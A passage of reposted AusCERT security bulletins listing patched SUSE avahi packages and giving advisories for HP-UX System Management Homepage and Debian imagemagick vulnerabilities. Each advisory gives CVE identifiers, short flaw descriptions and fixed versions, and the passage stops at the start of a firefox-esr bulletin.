libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE OpenStack Cloud 9 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE OpenStack Cloud 9 (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE OpenStack Cloud 8 (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE OpenStack Cloud 8 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (ppc64le x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (x86_64):
avahi-debuginfo-32bit-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (x86_64):
avahi-debuginfo-32bit-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (aarch64 ppc64le s390x x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (s390x x86_64):
avahi-debuginfo-32bit-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (aarch64 ppc64le s390x x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (s390x x86_64):
avahi-debuginfo-32bit-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP3-BCL (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP3-BCL (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP2-BCL (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o HPE Helion Openstack 8 (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o HPE Helion Openstack 8 (noarch):
avahi-lang-0.6.32-32.15.1

References:

o https://www.suse.com/security/cve/CVE-2021-3468.html
o https://bugzilla.suse.com/1184521

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLm0JuNLKJtyKPYoAQgg6A//SofIcLeuHqQOwmyQ/v06oyi+zK3o6uYY
1biRGa8DJuLtUGpvQ0/Grd9ZwpRjukePe1Aqrxr8ltbJ3nmYlKA/hhhmCgTfSecs
kDfbrKR3bCCkq8EiMi8CrF1a9QarZqL5/b1EE9WebUsihJ/FJ46tv9j2/dqP2zBO
5U+c6jufyGP1/y7PColgeoYXElrKKzHmY9BN8U3EsAwFbveS3gCz6c1HtKo3C+SQ
66WuVJXYr/VQop3sFEnB3XI0bhFf72010Yg7ZgthdGnZcVGH9a4E4I5yqFYbBKzI
y32DoodmWTVzz/9LVy3begTYAY4RBdCUT9tbnzeUjcxZp+U0TwBe1uLZrhxbfxlD
UJ7J3YBcopvVhyRv4LapyNqfw9LdDMLs9p1AaxAV8fk4v7PwM9AOXLR+uux2i+Vo
8BxtEclZEOIL9KWixTPVBGzrDtbtm4yGeCA42/Y/eptMYieX0kcI7shB9Y18V1Pm
cu+UR9o7Xb6qN4X/5SmjYoki403ueWUDqb4F0790q8Nzz24yefyXO8ySk0IGDPu0
CVfe/47VtH9oC2qEEA7yP4O5LAjyev5lT/O4HS2sf1jYEJzH41yTU8Zp0DX/sDRv
4o1HR+HYO7W930z7Y3xektlhCAgG4vXPFSs45mKz/XjV9L6im2VSCklmX9f4zXzm
Du9mXHCsU44=
=eOi9
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1941.2 – UPDATE [SUSE] avahi: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1941-2-update-suse-avahi-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1941-2-update-suse-avahi-multiple-vulnerabilities

ESB-2021.1947 – [Win][UNIX/Linux] HP-UX System Management Homepage (SMH): Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1947
HPE HP-UX System Management Homepage, Multiple Remote Vulnerabilities
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: HP-UX System Management Homepage (SMH)
Publisher: Hewlett-Packard
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Execute Arbitrary Code/Commands — Remote/Unauthenticated
Cross-site Scripting — Remote with User Interaction
Access Confidential Data — Remote with User Interaction
Unauthorised Access — Existing Account
Resolution: Patch/Upgrade

Original Bulletin:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbux04166en_us

– ————————–BEGIN INCLUDED TEXT——————–

SECURITY BULLETIN
Document ID: hpesbux04166en_us

Version: 1

HPESBUX04166 rev.1 – HPE HP-UX System Management Homepage, Multiple Remote Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2021-06-01
Last Updated: 2021-06-01

Potential Security Impact: Local: Authentication Bypass; Remote: Arbitrary Code Execution, Code Execution

Source: Hewlett Packard Enterprise, HPE Product Security Response Team

VULNERABILITY SUMMARY
HPE has identified several vulnerabilities in HP-UX System Management Homepage (SMH). HP-UX SMH prior to A.3.2.21.03 is vulnerable to Cross-site scripting (XSS), Buffer overflow, and HSTS vulnerability.

References:
CVE-2016-4393
CVE-2016-4394
CVE-2016-4395

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX System Management Software A.3.2.21.03 or earlier
HPE System Management Homepage A.3.2.21.03 or earlier

BACKGROUND
HPE calculates CVSS using CVSS Version 3.1. If the score is provided from NIST,
we will display Version 2.0, 3.0, or 3.1 as provided from NVD.

Reference, V3 Vector, V3 Base Score, V2 Vector, V2 Base Score

CVE-2016-4393 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N 4.2 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9

CVE-2016-4394 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L 6.5 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8

CVE-2016-4395 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 7.5 (AV:N/AC:L/Au:N/C:N/I:C/A:N) 7.8

Information on CVSS is documented in HPE Customer Notice: HPSN-2008-002

RESOLUTION
HPE has provided an update to resolve these issues.

System Management Home Page version A.3.2.21.05 is available here:

https://myenterpriselicense.hpe.com/cwp-ui/free-software/SysMgmtWeb

HISTORY
Version:1 (rev.1) – 1 June 2021 Initial release

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmpV+NLKJtyKPYoAQhE/hAApSsMnjN1BqN/4AiANdaCoAj6k6BAPd4s
hlWQSzcfJi9OSv+0kLroEdAi2Y8UG91L8ib5n+Rok//2+ih885eFedHcXCaU3QHi
LatwtmI7IAqKHollQOaemK7U74TwAutbPgkFPNavVBbEUpg6BjQxLrevZYA57t77
et4bVLkxpjTZpNk+DQa4wYm5VUL2CcOFKgDl1sZytrjLXdbSBdgLCBk/RO38ktgy
1salSFzXcgLr8Uq1N0ntutINFcKKwWXpFxcqd7j2Kh3DS4R4GLvJFlAkUqQj8QgU
hYU+Fe+OOCAxhtI7TSDLeQzgiBizBt+EcUww0eIAh81Y3LntHOOo2XoNwfVKXo2m
RxD1g2O0otfCwYI+rDu4H0hb0W5vWG9yMTOz7tkpd5MrODC/GydHB3Fr/AAG7e1x
TeXa0OhsbjWbczeiR/VecsV7LjlFgXLZ+DLLTKpG7hqUw/vZZ0Ym5o3TgJ2UeXjO
P+QYVWidKwfUofsoC60eLPpAE8HzoGaV2QasO/Y79w3t9kfDAG6whogRUZnTPLxH
JtTOWX8uoBwkO8fFiM9B+ZgVOTGz5tPihS0BUmBrNZDi98byEA0qgvRBP/qA4JMM
JZhwwTyolMSeODHr8G+K0AnH9eAxA9MmJCHQCAKxHUHULGxp9ppbgOAcIoa8vBQu
FgEYxFEAQD0=
=8Vnm
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1947 – [Win][UNIX/Linux] HP-UX System Management Homepage (SMH): Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1947-winunix-linux-hp-ux-system-management-homepage-smh-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1947-winunix-linux-hp-ux-system-management-homepage-smh-multiple-vulnerabilities

ESB-2021.1948 – [Debian] imagemagick: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1948
imagemagick security update
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: imagemagick
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Denial of Service — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Reduced Security — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20313 CVE-2021-20312 CVE-2021-20309
CVE-2021-20245 CVE-2021-20243 CVE-2020-27751

Reference: ESB-2021.1350
ESB-2021.0719
ESB-2021.0276

Original Bulletin:
https://lists.debian.org/debian-lts-announce/2021/06/msg00000.html

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian LTS Advisory DLA-2672-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Anton Gladky
June 02, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : imagemagick
Version : 8:6.9.7.4+dfsg-11+deb9u13
CVE ID : CVE-2020-27751 CVE-2021-20243 CVE-2021-20245 CVE-2021-20309
CVE-2021-20312 CVE-2021-20313

Multiple security issues have been discovered in imagemagick.

CVE-2020-27751

A flaw was found in MagickCore/quantum-export.c. An attacker who submits a
crafted file that is processed by ImageMagick could trigger undefined behavior
in the form of values outside the range of type
`unsigned long long` as well as a shift exponent that is too large for
64-bit type. This would most likely lead to an impact to application availability,
but could potentially cause other problems related to undefined behavior.

CVE-2021-20243

A flaw was found in MagickCore/resize.c. An attacker who submits a crafted
file that is processed by ImageMagick could trigger undefined behavior
in the form of math division by zero.

CVE-2021-20245

A flaw was found in coders/webp.c. An attacker who submits a crafted file that
is processed by ImageMagick could trigger undefined behavior in the form of
math division by zero.

CVE-2021-20309

A division by zero in WaveImage() of MagickCore/visual-effects.c may trigger
undefined behavior via a crafted image file submitted to an application using
ImageMagick.

CVE-2021-20312

An integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c may trigger
undefined behavior via a crafted image file that is submitted by an attacker
and processed by an application using ImageMagick.

CVE-2021-20313

A potential cipher leak when the calculate signatures in TransformSignature is possible.

For Debian 9 stretch, these problems have been fixed in version
8:6.9.7.4+dfsg-11+deb9u13.

We recommend that you upgrade your imagemagick packages.

For the detailed security status of imagemagick please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/imagemagick

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmC4YaYACgkQ0+Fzg8+n
/wYMuw//ZsXNvwxPZRk252ZwNcHveR/+5dRe93CB+WSGBbUqaTSfQzvqM9DLQxZi
G9D2srgZK+yg1kev4Wa3FufpEjJkE3YFWLvEjhBhqAuj+Px1y/K3YNaRhPw1xC0o
z7GIyoLWi3jAsyyZnOJupUfPpo+ac6yFcT1eAYGMS2hLS6WDx/32l+YBflYKWja0
eqIWfgXwxSA6uaTjV4SNc6JP1VqoA44ZJE7sS9R9oYhR5ewkQ+rDIDfAHyOG/gk/
EG0UwbZZWlpVsPzvEHZxanr2A2+GvJZ3AQ1hirlbWyGcf4Jv4uJ/Xw8jdH7rG1EE
VgqEFHGRVznAQXmbGDPvoREMgSQiYd0yWYs0yVqUGT0Asp5nyr+1bDna8irG5cok
1Ubg+u6YquUa2PPbmWp7zK6+7o4A6PW48mAt29YwIM8vrZE4AV3fW6a4XXWEeuTB
wu3ljrhmYPmm9hO9eG8RrK8810+wDCnTeX9lXI2pDF/9dcllXku/ArtXR+e0Ejxv
xESCkYOjVEY7MCVwuNvVZE197LAXqctUQ7aoTpixnulmTpmmx9OG0Wg8DbQhS1cI
XFJXBL9tmYuN2dwzk7R8trOtZWl2rDzHbxPXR3EFO/fU+cjCMRMfKt90Ed6bKmfd
4v6AXVWZXSow02IDi5Nud+L6FAQZ9ZkjLjOK9Updboe7MoIIy2A=
=e6iK
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmpq+NLKJtyKPYoAQjDlQ/+Jg7C9D5Hk6tlOKASoh8TXxCIi2vLCb2g
G6PdblHa91AEaYDqpWsRMXzr4KJPosuQN2xRDTm16K0XLpIeLAvbuOkms+b3Vd1k
NYFfx+dS2EuEc3NmFnl4nLE+YJ2X/zDvnu2O3BJu786i3VZdz6Isr5Hko0AoUQ17
1o7au1LdtkxpYNktYTQv62rfkx+VRHTl2+a+sTyuDS4SQDV8rMgRQTe6ThWjFLY1
9XF3GCgLosZjzpHAq5o3gC7wnxdg0RDReRjMMbJpj+Map8oOSu1V38ESuu+qtBBv
Zadwurx/8JWrj9bd+hKCqD2tCpo5zHN7GxxSgumVxG8UX4xdA0aKxpJTneANxe3J
43NwcEmU8FW2NnMdzN21VzyAOMmmUE7yMw9flI7WYt8l7PD7AyXnF3MRm5Me8SbR
JC4pLAqMb4CVy4YnA3RscSINUobJVUqkJtUbm9lH/xjyhRUmyaa8sUsgratHDmgT
GFgloXoTIublB6EdP0vXzOFueN+B/KPKbbmdfde6eWQnhFBYtU1V41aT0yFhIIm8
I93PiIBk/6HuzHs/h0fjutSU+yr4VePZ9LbupFOJEl6/OPP3s1IiBXTDJFKVQist
z2PwBpYqrPGP5TjEsxcnA030IZevbZ+gXwzwH4hahthiEsxUShxVykXXKU58OEDK
dp0QVQzcz6c=
=JXR5
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1948 – [Debian] imagemagick: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1948-debian-imagemagick-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1948-debian-imagemagick-multiple-vulnerabilities

ESB-2021.1949 – [Debian] firefox-esr: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
